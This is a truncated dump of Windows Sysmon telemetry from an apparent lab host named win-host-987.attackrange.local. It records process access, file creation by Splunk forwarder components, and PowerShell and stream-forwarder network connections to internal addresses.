18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.302{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.287{B81B27B7-4CE8-613A-1190-03000000C801}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A63A1B13AFDC07E6A1ED25C3695E306,SHA256=CC2F70EF8366F47F3EF9591E68C2550DEC5B778FB1B6CCBC70C230B89C12E1D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:53.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56480-false10.0.1.12-8000- 23542300x800000000000000035083463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.301{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=722483DAE679821153B01521A92BF74D,SHA256=85C51C94CC31E35085940EF87CE2C5EDD5909AC957E661C56B38EE849B8917B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.301{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=795DB499E27C033CFBA036492BC645C5,SHA256=A64402693DF73FB84C00DD1946F1B2DD939249528257CA9C8BBAD84DFBAFAE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.164{B81B27B7-4CE8-613A-1290-03000000C801}47926080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:29.001{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:28.986{B81B27B7-4CE8-613A-1290-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:30.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE56087692FD2EAA18F01D4E7FB91F3,SHA256=DB052B562C185C8A3C8D1D8C3A95B8AA87A20360B00AAD4A2D72966558C854FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:55.128{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56481-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:30.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=158384107B87B5B4172F7CCEFE40B8C8,SHA256=62A5B13C8CD5080ED6AB38BA46FACB35778DDB5A0B9B6412D073A5D576EAF151,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7D4FAEA5DF960519DB488B7F1D6998F,SHA256=E9895712BDEAC9206853A9A0B7E436CD2908A8243DF48E86509704EF6B63425C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.947{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF717aa777.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:32.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD71C48246AF0CE0CB1C588B22B1E8AA,SHA256=EB5119EBAC5499A367D67874E6477AF8A1F0248B188D3228E99FCA37F3090687,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:33.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0986A0DA1434D3504836CB61FAACDB,SHA256=5161D09DE1ED5E8F0230B3FDE6D9C7D1B865F31FA8FB77BE45A58EC0A2C2C8AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:58.212{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56482-false10.0.1.12-8000- 354300x800000000000000035083476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:00.142{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56483-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:35.367{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=37B7AA17F9D31FB8B486DAFEF8AB623C,SHA256=3ED1C82D0859714B5D7D24ED0ABF482AB5E8F9A90CEBBF510549D25914D1AB96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:34.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3072D89AADCBF887CC53BE0765F378C,SHA256=AABBCE906A60E0D7EE3C0C0764A2E38835BE4CE6F3BF9A720C9E8C769EDAE663,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:36.366{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C24E29C13CB54A7191CE600C1759E76D,SHA256=316FA74C30243935E28722E3012367F9D68BF0DFAEB53ACCB03BD58B25EC74BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:35.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85B954C69F4E6465BB63FA5F71F07F77,SHA256=BBE1460B446681AE57CECD71C301D2D17BB5ECFF3187332956F61C79F2C2C113,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:37.013{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47074EA584A009CF99A240E080005868,SHA256=CC74EDC1C25912D672C265067EB86C2D452B9F3E5F68999D088160686E94C7E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:38.027{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EE7DB46A01B1AF3C43933E6568037A,SHA256=1A601CE6F54D68D0DDEAC33486088CA9A7F76A0CA49932808A3DBADE09F62901,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:04.155{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56485-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:03.270{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56484-false10.0.1.12-8000- 23542300x800000000000000035083482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:39.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0B3ED5606EC9F0582478441A850136CC,SHA256=518D0714A21172D7A297991075C9182CD775346B9191411849A56F36D864CB4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:39.060{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3BE7529DEF320501CE3C27AA296B459,SHA256=7D29F5951A8632DFC40C32588357F0A40203769ACC37EFB5BD18F521803EE859,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:40.079{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B7A425464F23A83331F7A392266872E,SHA256=7943C50CB4E69C0122B1943311642A4FFCA4B8601043C50997C108BFC245BCAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:41.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CAB7CDB953D68B642EEF5E65E123F49,SHA256=421210C4449E8DFF16B7FD58CF83BF4AF017F28FD112B1B0AD6E3A7873FE9A7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:42.139{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A686EEC04175148CB704B3ECE98FA0,SHA256=1A7F2B8B9971ADFD3BFE7B3E2D0F299F3289FB2138D85CE45FD26A4D97DDBA4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:43.923{B81B27B7-4CF7-613A-1390-03000000C801}20443900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 